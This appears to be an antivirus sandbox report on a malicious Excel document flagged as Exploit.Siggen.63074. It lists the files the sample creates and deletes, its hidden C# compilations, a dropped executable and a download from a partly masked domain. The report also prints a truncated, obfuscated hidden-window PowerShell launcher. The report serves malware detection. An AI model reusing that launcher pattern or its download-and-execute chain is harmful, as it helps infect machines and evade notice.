Exploit.Siggen.63074

Technical Information

Malicious functions

Executes the following (exploit)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function ncda11c {param($v9d1d)$qf87127='d4655';$cf511b='';for ($i=0; $i -lt $v9d1d.length;$i+=2){$l134775=[convert]::ToByte($v9d1d.Substring($i,2),16);$cf511b+=[char]($l1...

Modifies file system

Creates the following files

%TEMP%\7pffdpk5.0.cs
%TEMP%\resa0b3.tmp
%TEMP%\bmydkved.dll
%TEMP%\yw-sfsn9.0.cs
%TEMP%\yw-sfsn9.cmdline
%TEMP%\yw-sfsn9.out
%TEMP%\cscb207.tmp
%TEMP%\resb218.tmp
%TEMP%\yw-sfsn9.dll
%TEMP%\ky7gj_hs.0.cs
%TEMP%\uvfeues6.cmdline
%TEMP%\ky7gj_hs.cmdline
%TEMP%\cscc214.tmp
%TEMP%\resc225.tmp
%TEMP%\ky7gj_hs.dll
%TEMP%\fj50rwaf.0.cs
%TEMP%\fj50rwaf.cmdline
%TEMP%\fj50rwaf.out
%TEMP%\cscf1fe.tmp
%TEMP%\resf20f.tmp
%TEMP%\fj50rwaf.dll
%TEMP%\bmydkved.out
%TEMP%\csca0a2.tmp
%TEMP%\bmydkved.cmdline
%TEMP%\bmydkved.0.cs
%TEMP%\h5ipugzg.dll
%TEMP%\7pffdpk5.out
%TEMP%\r3xvu28a.0.cs
%TEMP%\r3xvu28a.cmdline
%TEMP%\r3xvu28a.out
%TEMP%\csc74fe.tmp
%TEMP%\csc755c.tmp
%TEMP%\res751e.tmp
%TEMP%\7pffdpk5.dll
%TEMP%\res757c.tmp
%APPDATA%\v191a.exe
%TEMP%\ky7gj_hs.out
%TEMP%\uvfeues6.0.cs
%TEMP%\r3xvu28a.dll
%TEMP%\csc7a0f.tmp
%TEMP%\res7a20.tmp
%TEMP%\uvfeues6.dll
%TEMP%\h5ipugzg.0.cs
%TEMP%\h5ipugzg.cmdline
%TEMP%\h5ipugzg.out
%TEMP%\csc8ecf.tmp
%TEMP%\res8ee0.tmp
%TEMP%\7pffdpk5.cmdline
%TEMP%\uvfeues6.out
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{e9dbac1e-bc7a-40a4-afb8-3c05460b3a0d}.tmp

Deletes the following files

%TEMP%\res751e.tmp
%TEMP%\bmydkved.0.cs
%TEMP%\bmydkved.cmdline
%TEMP%\bmydkved.pdb
%TEMP%\bmydkved.out
%TEMP%\resb218.tmp
%TEMP%\cscb207.tmp
%TEMP%\yw-sfsn9.0.cs
%TEMP%\yw-sfsn9.out
%TEMP%\yw-sfsn9.pdb
%TEMP%\yw-sfsn9.cmdline
%TEMP%\csca0a2.tmp
%TEMP%\bmydkved.dll
%TEMP%\yw-sfsn9.dll
%TEMP%\ky7gj_hs.pdb
%TEMP%\ky7gj_hs.dll
%TEMP%\ky7gj_hs.out
%TEMP%\ky7gj_hs.cmdline
%TEMP%\ky7gj_hs.0.cs
%TEMP%\resf20f.tmp
%TEMP%\cscf1fe.tmp
%TEMP%\fj50rwaf.pdb
%TEMP%\fj50rwaf.cmdline
%TEMP%\fj50rwaf.0.cs
%TEMP%\resc225.tmp
%TEMP%\cscc214.tmp
%TEMP%\resa0b3.tmp
%TEMP%\h5ipugzg.0.cs
%TEMP%\h5ipugzg.dll
%TEMP%\res757c.tmp
%TEMP%\csc755c.tmp
%TEMP%\res7a20.tmp
%TEMP%\csc7a0f.tmp
%TEMP%\7pffdpk5.cmdline
%TEMP%\7pffdpk5.out
%TEMP%\7pffdpk5.dll
%TEMP%\7pffdpk5.pdb
%TEMP%\7pffdpk5.0.cs
%TEMP%\r3xvu28a.cmdline
%TEMP%\r3xvu28a.dll
%TEMP%\csc74fe.tmp
%TEMP%\r3xvu28a.out
%TEMP%\r3xvu28a.pdb
%TEMP%\uvfeues6.0.cs
%TEMP%\uvfeues6.pdb
%TEMP%\uvfeues6.cmdline
%TEMP%\uvfeues6.out
%TEMP%\uvfeues6.dll
%TEMP%\res8ee0.tmp
%TEMP%\csc8ecf.tmp
%TEMP%\h5ipugzg.pdb
%TEMP%\h5ipugzg.cmdline
%TEMP%\h5ipugzg.out
%TEMP%\r3xvu28a.0.cs
%TEMP%\fj50rwaf.out
%TEMP%\fj50rwaf.dll

Network activity

TCP

HTTP GET requests

http://fo####alityc.net/sirp/KpdHfnxDtL.exe

UDP

DNS ASK fo####alityc.net

Miscellaneous

Creates and executes the following

'%APPDATA%\v191a.exe'
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fj50rwaf.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC225.tmp" "%TEMP%\CSCC214.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ky7gj_hs.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB218.tmp" "%TEMP%\CSCB207.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yw-sfsn9.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA0B3.tmp" "%TEMP%\CSCA0A2.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bmydkved.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8EE0.tmp" "%TEMP%\CSC8ECF.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h5ipugzg.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7A20.tmp" "%TEMP%\CSC7A0F.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uvfeues6.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES757C.tmp" "%TEMP%\CSC755C.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES751E.tmp" "%TEMP%\CSC74FE.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\r3xvu28a.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\7pffdpk5.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF20F.tmp" "%TEMP%\CSCF1FE.tmp"' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function ncda11c {param($v9d1d)$qf87127='d4655';$cf511b='';for ($i=0; $i -lt $v9d1d.length;$i+=2){$l134775=[convert]::ToByte($v9d1d.Substring($i,2),16);$cf511b+=[char]($l1...' (with hidden window)

Executes the following

'%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fj50rwaf.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC225.tmp" "%TEMP%\CSCC214.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ky7gj_hs.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB218.tmp" "%TEMP%\CSCB207.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yw-sfsn9.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA0B3.tmp" "%TEMP%\CSCA0A2.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bmydkved.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8EE0.tmp" "%TEMP%\CSC8ECF.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h5ipugzg.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7A20.tmp" "%TEMP%\CSC7A0F.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\uvfeues6.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES757C.tmp" "%TEMP%\CSC755C.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES751E.tmp" "%TEMP%\CSC74FE.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\r3xvu28a.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\7pffdpk5.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF20F.tmp" "%TEMP%\CSCF1FE.tmp"
'%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding

Технології

Терміни

Навчання

Міфи

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней